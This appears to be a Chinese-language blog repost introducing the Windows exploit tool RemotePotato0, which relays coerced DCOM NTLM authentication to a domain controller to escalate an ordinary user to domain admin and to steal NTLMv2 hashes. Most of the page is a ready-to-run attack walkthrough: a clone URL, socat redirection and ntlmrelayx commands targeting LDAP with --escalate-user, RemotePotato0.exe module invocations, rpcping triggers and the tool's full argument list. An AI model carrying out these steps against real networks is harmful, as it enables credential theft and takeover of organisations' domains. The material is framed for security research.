使用RemotePotato0从普通用户提升至域管理员
关于RemotePotato0
RemotePotato0是一款功能强大的Windows提权工具,本质上来说RemotePotato0是一个漏洞利用工具,可以帮助广大研究人员在Windows系统上,从一个普通用户提权至域管理员权限。
RemotePotato0可以利用DCOM激活服务,并触发针对当前登录到目标计算机的任何用户的NTLM身份验证。与此同时,该工具还需要在相同设备上已经有特权用户登录了(比如说,域管理员用户)。一旦触发NTLM type1,RemotePotato0将设置一个跨协议中继服务器,该服务器将负责接收特权type1消息,并通过解包RPC协议和HTTP打包身份验证,然后将其中继到第三个资源。在接收端,你可以设置另一个中继节点(如ntlmrelayx)或直接中继到特权资源。除此之外,RemotePotato0还允许抓取和窃取登录到目标设备上的每个用户的NTLMv2哈希。
源码获取
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/antonioCoco/RemotePotato0.git
使用场景
攻击设备(10.0.0.20)
目标设备(10.0.0.45)
目标域控制器(10.0.0.10)
模块0 - Rpc2Http跨协议中继服务器 + potato触发器
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.0.0.45:9999 &
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user normal_user
注意:如果你操作的是Windows Server <= 2016,你可以避免使用网络重定向器(socat):
query user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
模块1 - Rpc2Http跨协议中继服务器
.\RemotePotato0.exe -m 1 -l 9997 -r 10.0.0.20
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm
模块2 - RPC捕捉(哈希)服务器
.\RemotePotato0.exe -m 3 -l 9997
rpcping -s 127.0.0.1 -e 9997 -a connect -u ntlm
工具使用
RemotePotato0
Mandatory args:
-m module
Allowed values:
0 - Rpc2Http cross protocol relay server + potato trigger (default)
1 - Rpc2Http cross protocol relay server
2 - Rpc capture (hash) server + potato trigger
3 - Rpc capture (hash) server
Other args: (someone could be mandatory and/or optional based on the module you use)
-r 远程HTTP中继服务器IP
-t 远程HTTP中继服务器端口 (默认为80)
-x 流氓Oxid解析器IP (默认为127.0.0.1)
-p 流氓Oxid解析器端口 (默认为9999)
-l RPC中继服务器监听端口 (默认为9997)
-s 跨会话激活攻击的目标会话IP (默认为disabled)
-c CLSID (默认为{5167B42F-C111-47A1-ACC4-8EABE61B0B54})
工具演示
跨会话激活:【GIF】
哈希窃取:【GIF】
项目地址
RemotePotato0:https://github.com/antonioCoco/RemotePotato0
使用RemotePotato0从普通用户提升至域管理员相关推荐
- 利用dns特性把普通域用户提升到域管理员权限
翻译自:https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 ...
- 域管理员在域计算机安装程序,使用域用户权限|安装软件
1.在域中新建一个域账户比如setup设置密码永不过期用户不能更改密码,添加到域管理员组中. 2.修改域组策略计算机配置-windows设置---安全设置---本地策略---用户权限分配-找到 拒绝本 ...
- 三大策略 + 五大场景,揭秘如何提升私域转化率
本文为神策数据「私域建设实战操盘三部曲」之转化篇干货分享(戳这回看引流篇和留存篇),本文将从私域转化的闭环.私域转化的三大策略.五大典型场景转化方式等内容详细展开. 一.私域转化的闭环 私域转化成交主 ...
- SCRM---私域SOP提升私域运营效率和产出效果
客户助手官网地址:客户助手 私域流量是精细化的用户运营方式,与用户直接建立连接,对私域运营人力.运营服务质量提出了更高的要求.解决私域流量规模化增长的运营难题,需要标准化的运营人力和能力,也就是SOP ...
- 提升私域流量的转化率,你不得不了解的四种私域流量的运营模式
私域流量,2020年起最火的运营形式. 社群.朋友圈.企业微信.视频号等,都是它的载体之一,很多人都在布局和进行,但效果不一.不管是单链突破,还是全链路进组合,各种玩法层出不穷,最终这些玩法都要落脚到 ...
- 【Windows Server 2019】活动目录 (Active Directory) ——安装Acitve Directory域服务和提升为域控制器
目录 5. 安装 Active Directory 域服务 实验目的 5.1 配置服务器的IP地址 5.2 安装Active Diretory服务 (1)添加角色和功能 (2)进入[开始之前]界面 ( ...
- 如何使普通用户授权加入域的权限个数多于十个
在实际应用中,我们会遇到这种情况,我们让客户机加入域的授权帐户会是一个专用的帐户,此帐户一般不受任何权限,因为如果用脚本加入域的话此帐户的信息会写在加入域的脚本中. 但是当使用AD用户尝试加入域的工作 ...
- 域用户登录方法在计算机上不被允许,域管理员不允许本地交互式登陆的解决方法...
故障现象: 在2003年12月13日,主域服务器的管理员无法登陆,提示"此系统的本地策略不允许您采用交互式登录",导致登陆失败,用别的用户也出现相同提示,无法登陆. 故障分析: 造 ...
- 如何限制用户登录到域计算机
登录到属性对于内置域管理员Administrator无效. 默认情况下,创建新的Active Directory用户时,它们会自动添加到" 域用户"组中.反过来,默认情况下,将域用 ...
- 五年SEO经验分享之用户提升关键词排名。
做了多年的SEOer,应该对用户这次词非常敏感,那么用户会影响排名吗?如果会,那怎样影响排名?用户体验相对是比较虚的.大家一直在强调用户体验,那么在优化过程中,用户搜索过程中,用户有动机.先来了解第一 ...
最新文章
- 带修莫队 ---- 离散化 + 暴力 + 带修莫队 F. Machine Learning
- 通过QQ或者QQ帮助别人学习Lync之一
- [css] display有哪些值?分别说明他们的作用是什么?
- 水滴石穿之页面遮罩层实现、向window.open()打开的窗口POST数据
- LINUX C系统编程与PYTHON中的时间模块对比
- vscode 中 eslint 的配置
- vim介绍、vim颜色显示、vim一般模式操作
- 翻译:Vim从入门到精通 Mac OS
- 我怎么用计算机解锁vivo手机密码,vivo账号密码全忘了,手机已经无法解锁该怎么处理?...
- ListView控件商城列表
- 01将乌班图系统安装到U盘,实现即插即用
- 2021洛谷10月月赛3游记
- win10开始菜单点击无效(win10开始菜单点击无效,网络不启动,音频不启动)
- 张宇用的【数学公式壁纸】大公开!
- Centos 7分区合并
- 连接交换路由器的方式
- jdk-17下载与安装(window10)
- Windows-Server2003 关闭IE增强的安全配置堵塞方法
- HPLC鬼峰、基线漂移、拖尾、分叉峰、保留时间漂移、柱压过高等系列问题解析
- 【软件测试】测试理论之性能测试技术
热门文章
- POJ 2391 Ombrophobic Bovines【二分+最大流】
- 给editplus加一个主题
- STC学习:定时器和中断
- python控制鼠标_Python直接控制鼠标键盘模块 pyautogui
- OpenCV-图像处理(15、自定义线性滤波)
- Linux静态库运行找不到lc,创建和使用静态库(问题:undefined reference)
- python中sample()函数_PandasDataframe.sample()使用介绍
- 1050 String Subtraction (20 分)
- python queue join,python3多线程通信方式,主要理解队列的join()和task_done()方法
- Linux命令行手动配置无线wiff网络 iwconfig